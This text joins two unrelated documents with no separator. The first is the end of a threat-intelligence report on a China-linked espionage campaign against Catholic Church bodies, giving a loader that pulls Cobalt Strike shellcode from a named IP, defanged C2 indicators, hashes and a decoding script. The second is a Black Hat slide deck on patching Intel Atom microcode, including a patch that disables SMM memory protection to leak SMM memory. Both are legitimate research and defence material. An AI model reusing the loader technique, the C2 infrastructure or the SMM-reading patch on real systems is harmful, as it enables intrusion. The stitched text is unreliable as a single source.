exe, download the file DotNetLoader40.exe and invoke the “RunRemoteCode”
function contained within it.
DotNetLoader40.exe is a small .NET executable that essentially downloads and
then executes shellcode. The main function in DotNetLoader is “RunRemoteCode”
which takes a URL as an argument. The content is downloaded from the provided
URL, in this case, http://154.213.21[.]27/beacon.txt, and then sent to the function
“InjectShellCode.” The shellcode is then base64 decoded, decompressed, saved
to memory, and executed.
The shellcode loaded is Cobalt Strike Beacon, which is configured using the
Havex Malleable C2 profile. This Havex C2 code has been published on GitHub
and can be used by any entity that wishes to use it; and in this case, the attacker
is doing so in conjunction with Cobalt Strike. This can be seen both through the
URI used within the C2 URL (http://154.213.21[.]70/wp08/wp-includes/dtcla.php)
and the client and server headers and HTML content displayed below in Figure 15.
Figure 15: Network connections and server response to Cobalt Strike Beacon Havex Malleable C2
sample.
Poison Ivy
File Name
MpSvc.dll
SHA256 Hash
9bac74c592a36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d
The identified Poison Ivy sample is loaded using the above MpSvc.dll file,
masquerading as the Microsoft Windows Defender file of the same name. Once
loaded, web.miscrosaft[.]com is used for command and control.
File Name
OneDrive.exe
SHA256 Hash
7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
12
Outlook
Our research uncovered a suspected China state-sponsored campaign
targeting multiple high-profile entities associated with the Catholic Church ahead
of the likely renewal of the provisional China-Vatican deal in September 2020.
The CCP’s warming diplomatic relations with the Holy See has been commonly
interpreted as a means to facilitate increased oversight and control over its
unofficial Catholic church. This also supports the CCP’s wider stated goal of
“sinicizing religions” in China. Furthermore, it demonstrates that China’s interest
in control and surveillance of religious minorities is not confined to those within
the “Five Poisons,” exemplified by the continued persecution and detainment of
underground church members and allegations of physical surveillance of official
Catholic and Protestant churches.
The U.S. Ambassador-at-Large for International Religious Freedom recently
expressed concern regarding the impact of the new national security law within
Hong Kong, stating it has the “potential to significantly undermine religious
freedom.” The targeting of the Catholic diocese of Hong Kong is likely a valuable
intelligence source for both monitoring the diocese’s position on Hong Kong’s pro-
democracy movement and its relations with the Vatican. This marks a possible
precursor to increased limits on religious freedom within the special administrative
region, particularly where it coincides with pro-democracy or anti-Beijing positions.
RedDelta is a highly active threat activity group targeting entities relevant
to Chinese strategic interests. Despite the group’s consistent use of well-known
tools such as PlugX and Cobalt Strike, infrastructure reuse, and operations security
failures, these intrusions indicate RedDelta is still being tasked to satisfy intelligence
requirements. In particular, this campaign demonstrates a clear objective to target
religious bodies, and therefore we feel this is particularly pertinent for religious
and non-governmental organizations (NGOs) to take note and invest in network
defenses to counter the threat posed by Chinese state-sponsored threat activity
groups like RedDelta. A lack of ability to invest in security and detection measures
for many NGOs and religious organizations greatly increases the likelihood of
success for well-resourced and persistent groups, even using well-documented
tools, TTPs, and infrastructure.
Network Defense Recommendations
Recorded Future recommends that users conduct the following measures to
detect and mitigate activity associated with RedDelta activity:
• Configure your intrusion detection systems (IDS), intrusion prevention
systems (IPS), or any network defense mechanisms in place to alert on —
and upon review, consider blocking illicit connection attempts from — the
external IP addresses and domains listed in the appendix.
Additionally, we advise organizations to follow the following general
information security best practice guidelines:
• Keep all software and applications up to date; in particular, operating
systems, antivirus software, and core system utilities.
• Filter email correspondence and scrutinize attachments for malware.
• Make regular backups of your system and store the backups offline,
preferably offsite so that data cannot be accessed via the network.
• Have a well-thought-out incident response and communications plan.
• Adhere to strict compartmentalization of company-sensitive data. In
particular, look at which data anyone with access to an employee account
or device would have access to (for example, through device or account
takeover via phishing).
• Strongly consider instituting role-based access, limiting company-wide
data access, and restricting access to sensitive data.
• Employ host-based controls; one of the best defenses and warning signals
to thwart attacks is to conduct client-based host logging and intrusion
detection capabilities.
• Implement basic incident response and detection deployments and
controls like network IDS, netflow collection, host logging, and web proxy,
alongside human monitoring of detection sources.
• Be aware of partner or supply chain security standards. Being able to
monitor and enforce security standards for ecosystem partners is an
important part of any organization’s security posture.
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
13
CYBER THREAT ANALYSIS | CHINA
Recorded Future’s research group, Insikt, tracks threat actors
and their activity, focusing on state actors from China, Iran, Russia,
and North Korea, as well as cyber criminals - individuals and groups
- from Russia, CIS states, China, Iran, and Brazil. We emphasize
tracking activity groups and where possible, attributing them to
nation state government, organizations, or affiliate institutions.
Our coverage includes:
•
Government organizations and intelligence agencies,
their associated laboratories, partners, industry
collaborators, proxy entities, and individual threat
actors.
•
Recorded Future-identified, suspected nation state
activity groups, such as RedAlpha, RedBravo, Red Delta,
and BlueAlpha and many other industry established
groups.
•
Cybercriminal individuals and groups established and
named by Recorded Future
•
Newly emerging malware, as well as prolific,persistent
commodity malware
Insikt Group names a new threat activity group or campaign
when analysts have data corresponding to at least three points
on the Diamond Model of Intrusion Analysis with at least medium
confidence, derived from our Security Intelligence Graph. We can tie
this to a threat actor only when we can point to a handle, persona,
person, or organization responsible. We will write about the activity
as a campaign in the absence of this level of adversary data. We
use the most widely-utilized or recognized name for a particular
group when the public body of empirical evidence is clear the activity
corresponds to a known group.
Insikt Group utilizes a simple color and phonetic alphabet
naming convention for new nation state threat actor groups or
campaigns. The color corresponds to that nation’s flag colors,
currently represented below, with more color/nation pairings to
be added as we identify and attribute new threat actor groups
associated with new nations.
For newly identified cybercriminal groups, Insikt Group uses a
naming convention corresponding to the Greek alphabet. Where we
have identified a criminal entity connected to a particular country,
we will use the appropriate country color, and where that group may
be tied to a specific government organization, tie it to that entity
specifically.
Insikt Group uses mathematical terms when naming newly
identified malware.
ADVERSARY
INFRASTRUCTURE
CAPABILITY
VICTIM
Recorded Future Threat Activity Group and Malware Taxonomy
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
14
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
15
Appendix A — Indicators of Compromise
Command and Control Infrastructure
Domain
IP Address
First Seen
Last Seen
Description
ipsoftwarelabs[.]com
85.209.43[.]21
2019-11-08
*
PlugX C2
cabsecnow[.]com
167.88.180[.]32
2020-07-14
*
PlugX C2
cabsecnow[.]com
103.85.24[.]136
2020-06-10
2020-07-14
PlugX C2
cabsecnow[.]com
167.88.180[.]5
2019-10-26
2020-06-10
PlugX C2
cabsecnow[.]com
167.88.177[.]224
2019-09-18
2019-10-19
PlugX C2
lameers[.]com
167.88.180[.]32
2020-02-14
*
PlugX C2
lameers[.]com
167.88.180[.]132
2019-11-27
2020-02-13
PlugX C2
systeminfor[.]com
103.85.24[.]136
2020-07-15
*
PlugX C2
systeminfor[.]com
167.88.180[.]32
2020-05-29
2020-07-15
PlugX C2
systeminfor[.]com
103.85.24[.]190
2020-05-17
2020-05-29
PlugX C2
N/A
103.85.24[.]149
2020-06-08
2020-06-23
PlugX C2
N/A
167.88.180[.]198
2020-06-15
2020-06-25
PlugX Payload Staging
Server
web.miscrosaft[.]com
154.213.21[.]207
2020-04-27
*
PIVY C2
N/A
154.213.21[.]70
2020-06-04
*
Cobalt Strike C2
lib.jsquerys[.]net
154.213.21[.]70
2020-06-04
*
Associated with Cobalt
Strike C2
N/A
154.213.21[.]27
2020-06-04
*
Cobalt Strike Staging
Server
lib.hostareas[.]com
154.213.21[.]73
2020-05-13
*
Linked through
infrastructure overlap
*Denotes that domain or server is still live at time of publication.
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
16
PlugX
File Name
About China’s plan for Hong Kong security law.zip
MD5 Hash
660d1132888b2a2ff83b695e65452f87
SHA1 Hash
1d3b34c473231f148eb3066351c92fb3703d26c6
SHA256 Hash
86590f80b4e1608d0367a7943468304f7eb665c9195c24996281b1a958bc1512
File Name
N. 490.349 N. 491.189.zip
MD5 Hash
2a245c0245809f4a33b5aac894070519
SHA1 Hash
c27f2ed5029418c7f786640fb929460b9f931671
SHA256 Hash
fb7e8a99cf8cb30f829db0794042232acfe7324722cbea89ba8b77ce2dcf1caa
File Name
QUM, IL VATICANO DELL’ISLAM.rar
MD5 Hash
2e69b5ed15156e5680334fa88be5d1bd
SHA1 Hash
c435c75877b39406dbe06e357ef304710d567da9
SHA256 Hash
282eef984c20cc334f926725cc36ab610b00d05b5990c7f55c324791ab156d92
File Name
wwlib.dll
MD5 Hash
c6206b8eacabc1dc3578cec2b91c949a
SHA1 Hash
93e8445862950ef682c2d22a9de929b72547643a
SHA256 Hash
4cef5835072bb0290a05f9c5281d4a614733f480ba7f1904ae91325a10a15a04
File Name
wwlib.dll
MD5 Hash
2ec79d0605a4756f4732aba16ef41b22
SHA1 Hash
304e1eb8ab50b5e28cbbdb280d653efae4052e1f
SHA256 Hash
f6e5a3a32fb3aaf3f2c56ee482998b09a6ced0a60c38088e7153f3ca247ab1cc
File Name
acrord32.dll
MD5 Hash
6060f7dc35c4d43728d5ca5286327c01
SHA1 Hash
35ff54838cb6db9a1829d110d2a6b47001648f17
SHA256 Hash
8a07c265a20279d4b60da2cc26f2bb041730c90c6d3eca64a8dd9f4a032d85d3
File Name
hex.dll
MD5 Hash
e57f8364372e3ba866389c2895b42628
SHA1 Hash
fb29f04fb4ffb71f623481cffe221407e2256e0a
SHA256 Hash
bc6c2fda18f8ee36930b469f6500e28096eb6795e5fd17c44273c67bc9fa6a6d
File Name
adobeupdate.dat
MD5 Hash
2351F62176D4F3A6429D9C2FF7D444E2
SHA1 Hash
1BDBABE56B4659FCA2813A79E972A82A26EF12B1
SHA256 Hash
01C1FD0E5B8B7BBED62BC8A6F7C9CEFF1725D4FF6EE86FA813BF6E70B079812F
File Name
hex.dll
MD5 Hash
9c44ec556d53301d86c13a884128b8de
SHA1 Hash
7c683d3c3590cbc61b5077bc035f4a36cae097d4
SHA256 Hash
7d85ebd460df8710d0f60278014654009be39945a820755e1fbd59030c14f4c7
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
17
File Name
adobeupdate.dat
MD5 Hash
977beb9a5a2bd24bf333397c33a0a67e
SHA1 Hash
d7e55b655a2a90998dbab0f921115edc508e1bf9
SHA256 Hash
4c8405e1c6531bcb95e863d0165a589ea31f1e623c00bcfd02fbf4f434c2da79
Poison Ivy
File Name
MpSvc.dll
MD5 Hash
b613cc3396ae0e9e5461a910bcac8ca5
SHA1 Hash
28746fd20a4032ba5fd3a1a479edc88cd74c3fc9
SHA256 Hash
9bac74c592a36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d
Cobalt Strike
File Name
OneDrive.exe
MD5 Hash
83763fe02f41c1b3ce099f277391732a
SHA1 Hash
3ed2d4e3682d678ea640aadbfc08311c6f2081e8
SHA256 Hash
7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
18
Appendix B — MITRE ATT&CK Mapping
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
19
Appendix C — Python Decoding Script
import lznt1
def decompress(filename):
decompressed=””
with open(filename,”rb”) as f:
decompressed = lznt1.decompress(f.read())
return decompressed
compressed=True
filename=”http_dll.dat”
if compressed==False:
data=decompress(filename)
else:
with open(filename,”rb”) as dat:
data=dat.read()
key=[]
for d in data:
if d !=0x00:
key.append(d)
else:
break
klen=len(key)
output = []
loop_condition = 0
for c in data[klen+1:]:
current_key = key[loop_condition%klen]
output.append(c^current_key)
loop_condition += 1
with open(“http_dll.dat.bin”,”wb”) as decoded:
decoded.write(bytearray(output))
CYBER THREAT ANALYSIS | CHINA
About Recorded Future
Recorded Future arms security teams with the only complete security intelligence
solution powered by patented machine learning to lower risk. Our technology
automatically collects and analyzes information from an unrivaled breadth of sources
and provides invaluable context in real time and packaged for human analysis or
integration with security technologies.
20
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728 | pdf |
Custom Processing Unit:
Tracing and Patching Intel Atom Microcode
Black Hat USA 2022
Pietro Borrello
Sapienza University of Rome
Martin Schwarzl
Graz University of Technology
Michael Schwarz
CISPA Helmholtz Center for Information Security
Daniel Gruss
Graz University of Technology
Outline
1. Deep dive on CPU µcode
1
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Outline
1. Deep dive on CPU µcode
2. µcode Software Framework
1
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Outline
1. Deep dive on CPU µcode
2. µcode Software Framework
3. Reverse Engineering of the secret µcode update algorithm
1
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Outline
1. Deep dive on CPU µcode
2. µcode Software Framework
3. Reverse Engineering of the secret µcode update algorithm
4. Some bonus content ;)
1
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Disclaimer
• This is based on our understanding of CPU Microarchitecture.
• In theory, it may be all wrong.
• In practice, a lot seems right.
2
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
How do CPUs work?
3
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Positive Technologies Results
• Red Unlock of Atom Goldmont (GLM) CPUs
4
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Positive Technologies Results
• Red Unlock of Atom Goldmont (GLM) CPUs
• Extraction and reverse engineering of GLM µcode format
4
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Positive Technologies Results
• Red Unlock of Atom Goldmont (GLM) CPUs
• Extraction and reverse engineering of GLM µcode format
• Discovery of undocumented control instructions to access
internal buffers
4
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Microcoded Instuctions 101
. . .
cpuid
. . .
. . .
. . .
. . .
XLAT
5
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Microcoded Instuctions 101
. . .
cpuid
. . .
. . .
. . .
. . .
XLAT
µcode ROM
seqw
ROM
5
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Microcoded Instuctions 101
. . .
cpuid
. . .
. . .
. . .
. . .
XLAT
µcode ROM
seqw
ROM
µcode RAM
seqw
RAM
5
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Microcoded Instuctions 101
. . .
cpuid
. . .
. . .
. . .
. . .
XLAT
µcode ROM
seqw
ROM
µcode RAM
seqw
RAM
match & patch
5
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode instruction
OP1
09282eb80236
OP2
0008890f8009
OP3
092830f80236
SEQW
0903e480
6
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Deep Dive into the µcode
U1a54: 09282eb80236
CMPUJZ_DIRECT_NOTTAKEN(tmp6, 0x2, U0e2e)
U1a55: 0008890f8009
tmp8:= ZEROEXT_DSZ32(0x2389)
U1a56: 092830f80236
SYNC-> CMPUJZ_DIRECT_NOTTAKEN(tmp6, 0x3, U0e30)
U1a57: 000000000000
NOP
SEQW:
0903e480
SEQW GOTO U03e4
7
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Building a Ghidra µcode Decompiler
8
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Building a Ghidra µcode Decompiler
8
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
9
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
• MRSs → CRBUS addr
9
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
• MRSs → CRBUS addr
• Control and Status registers
9
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
• MRSs → CRBUS addr
• Control and Status registers
• SMM configuration
9
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
• MRSs → CRBUS addr
• Control and Status registers
• SMM configuration
• Local Direct Access Test (LDAT) access
9
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Accessing the µcode Sequencer
• The µcode Sequencer manages the access to µcode ROM and
RAM
10
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Accessing the µcode Sequencer
• The µcode Sequencer manages the access to µcode ROM and
RAM
→ The LDAT has access to the µcode Sequencer
10
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Accessing the µcode Sequencer
• The µcode Sequencer manages the access to µcode ROM and
RAM
→ The LDAT has access to the µcode Sequencer
→ We can access the LDAT through the CRBUS
10
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Accessing the µcode Sequencer
• The µcode Sequencer manages the access to µcode ROM and
RAM
→ The LDAT has access to the µcode Sequencer
→ We can access the LDAT through the CRBUS
→ If we can access the CRBUS we can control µcode!
10
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
udbgrd and udbgwr
Positive Technologies discovered the existance of two secret
instructions that can access (RW):
• System agent
• URAM
• Staging buffer
• I/O ports
• Power supply unit
11
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
udbgrd and udbgwr
Positive Technologies discovered the existance of two secret
instructions that can access (RW):
• System agent
• URAM
• Staging buffer
• I/O ports
• Power supply unit
• CRBUS
11
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
e.g., Writing to the CRBUS
def CRBUS _WRITE(ADDR , VAL):
udbgwr(
rax: ADDR ,
rbx|rdx: VAL ,
rcx: 0,
)
12
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Program LDAT from the CRBUS
// Decompile
of: U2782
- part
of
ucode
update
routine
w r i t e 8 ( crbus 06a0 , ( ucode address − 0 x7c00 ) ) ;
MSLOOPCTR = (∗( ushort
∗) (( long ) u cod e u p d a t e p t r + 3) − 1) ;
syncmark ( ) ;
i f
( ( i n u c o d e u s t a t e & 8) != 0)
{
s y n c f u l l ( ) ;
w r i t e 8 ( crbus 06a1 ,0 x30400 ) ;
u cod e p tr = ( ulong
∗) (( long ) u cod e u p d a t e p t r + 5) ;
do {
ucode qword = ∗ ucode ptr ;
u cod e p tr = ucode ptr + 1;
w r i t e 8 ( crbus 06a4 , ucode qword ) ;
w r i t e 8 ( crbus 06a5 , ucode qword >> 0x20 ) ;
syncwait ( ) ;
MSLOOPCTR −= 1;
}
while
(−1 < MSLOOPCTR) ;
s y n c f u l l ( ) ;
13
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Writing to the µcode Sequencer
def
ucode_sequencer_write (SELECTOR , ADDR , VAL):
CRBUS [0 x6a1] = 0x30000 | (SELECTOR
<< 8)
CRBUS [0 x6a0] = ADDR
CRBUS [0 x6a4] = VAL & 0xffffffff
CRBUS [0 x6a5] = VAL >> 32
CRBUS [0 x6a1] = 0
with
SELECTOR:
2 -> SEQW
PATCH RAM
3 -> MATCH & PATCH
4 -> UCODE
PATCH RAM
14
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Match & Patch 101
Redirects execution from µcode ROM to µcode RAM to execute patches.
patch_off = (patch_addr - 0x7c00) / 2;
entry:
+--+-----------+------------------------+----+
|3e| patch_off |
match_addr
|enbl|
+--+-----------+------------------------+----+
24
16
1
0
15
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
The first µcode Framework
Leveraging udbgrd/wr we can patch µcode via software
16
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
The first µcode Framework
Leveraging udbgrd/wr we can patch µcode via software
• Completely observe CPU behavior
16
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
The first µcode Framework
Leveraging udbgrd/wr we can patch µcode via software
• Completely observe CPU behavior
• Completely control CPU behavior
16
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
The first µcode Framework
Leveraging udbgrd/wr we can patch µcode via software
• Completely observe CPU behavior
• Completely control CPU behavior
• All within a BIOS or kernel module
16
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode Framework
Patch µcode
17
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode Framework
Patch µcode
Hook µcode
17
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode Framework
Patch µcode
Hook µcode
Trace µcode
17
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode patches
We can change the CPU’s behavior.
18
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode patches
We can change the CPU’s behavior.
• Change microcoded instructions
18
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode patches
We can change the CPU’s behavior.
• Change microcoded instructions
• Add functionalities to the CPU
18
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode patch Hello World!
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
rax:= ZEROEXT_DSZ64(0x6f57206f6c6c6548) # ‘Hello Wo’
rbx:= ZEROEXT_DSZ64(0x21646c72) # ‘rld!\x00’
UEND
19
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode patch Hello World!
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
rax:= ZEROEXT_DSZ64(0x6f57206f6c6c6548) # ‘Hello Wo’
rbx:= ZEROEXT_DSZ64(0x21646c72) # ‘rld!\x00’
UEND
1. Assemble µcode
2. Write µcode at 0x7c00
3. Setup Match & Patch: 0x0428 → 0x7c00
4. rdrand → “Hello World!”
19
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make rdrand less boring
rdrand returns random data, what if we make it return SMM memory?
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
tmp1:= MOVEFROMCREG_DSZ64(CR_SMRR_MASK)
tmp2:= ZEROEXT_DSZ64(0x0)
MOVETOCREG_DSZ64(tmp2, CR_SMRR_MASK) # DISABLE SMM MEMORY RANGE
rax:= LDPPHYS_DSZ64(0x7b000000) # SMROM ADDR
MOVETOCREG_DSZ64(tmp1, CR_SMRR_MASK)
UEND
20
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make rdrand less boring
rdrand returns random data, what if we make it return SMM memory?
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
tmp1:= MOVEFROMCREG_DSZ64(CR_SMRR_MASK)
tmp2:= ZEROEXT_DSZ64(0x0)
MOVETOCREG_DSZ64(tmp2, CR_SMRR_MASK) # DISABLE SMM MEMORY RANGE
rax:= LDPPHYS_DSZ64(0x7b000000) # SMROM ADDR
MOVETOCREG_DSZ64(tmp1, CR_SMRR_MASK)
UEND
20
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make rdrand less boring
rdrand returns random data, what if we make it return SMM memory?
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
tmp1:= MOVEFROMCREG_DSZ64(CR_SMRR_MASK)
tmp2:= ZEROEXT_DSZ64(0x0)
MOVETOCREG_DSZ64(tmp2, CR_SMRR_MASK) # DISABLE SMM MEMORY RANGE
rax:= LDPPHYS_DSZ64(0x7b000000) # SMROM ADDR
MOVETOCREG_DSZ64(tmp1, CR_SMRR_MASK)
UEND
20
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make rdrand less boring
rdrand returns random data, what if we make it return SMM memory?
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
tmp1:= MOVEFROMCREG_DSZ64(CR_SMRR_MASK)
tmp2:= ZEROEXT_DSZ64(0x0)
MOVETOCREG_DSZ64(tmp2, CR_SMRR_MASK) # DISABLE SMM MEMORY RANGE
rax:= LDPPHYS_DSZ64(0x7b000000) # SMROM ADDR
MOVETOCREG_DSZ64(tmp1, CR_SMRR_MASK)
UEND
20
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
DEMO
µcode hooks
Install µcode hooks to observe events.
• Setup Match & Patch to execute custom µcode at certain
events
• Resume execution
21
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make your own performance counter
We can make the CPU to react to certain µcode events, e.g., verw executed
.patch 0xXXXX # INSTRUCTION ENTRY POINT
.org 0x7da0
tmp0:= ZEROEXT_DSZ64(<counter_address>)
tmp1:= LDPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0)
tmp1:= ADD_DSZ64(tmp1, 0x1) # INCREMENT COUNTER
STADPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0, tmp1)
UJMP(0xXXXX + 1) # JUMP TO NEXT UOP
22
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Make your own performance counter
We can make the CPU to react to certain µcode events, e.g., verw executed
.patch 0xXXXX # INSTRUCTION ENTRY POINT
.org 0x7da0
tmp0:= ZEROEXT_DSZ64(<counter_address>)
tmp1:= LDPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0)
tmp1:= ADD_DSZ64(tmp1, 0x1) # INCREMENT COUNTER
STADPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0, tmp1)
UJMP(0xXXXX + 1) # JUMP TO NEXT UOP
22
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
5
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
5
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
5
3
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
5
3
4
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode traces
Trace µcode execution leveraging hooks.
cpuid
?
µcode
1
2
5
3
4
1
2
3
4
5
hook:
1.
dump timestamp
2.
disable hook
3.
continue
23
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let’s trace the execution of a µcode update!
24
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let’s trace the execution of a µcode update!
• Trigger a µcode update
24
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let’s trace the execution of a µcode update!
• Trigger a µcode update
• Trace if a microinstruction is executed
24
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let’s trace the execution of a µcode update!
• Trigger a µcode update
• Trace if a microinstruction is executed
• Repeat for all the possible µcode instructions
24
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let’s trace the execution of a µcode update!
• Trigger a µcode update
• Trace if a microinstruction is executed
• Repeat for all the possible µcode instructions
• Restore order
24
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
wrmsr
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
wrmsr
move ucode patch to 0xfeb01000
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
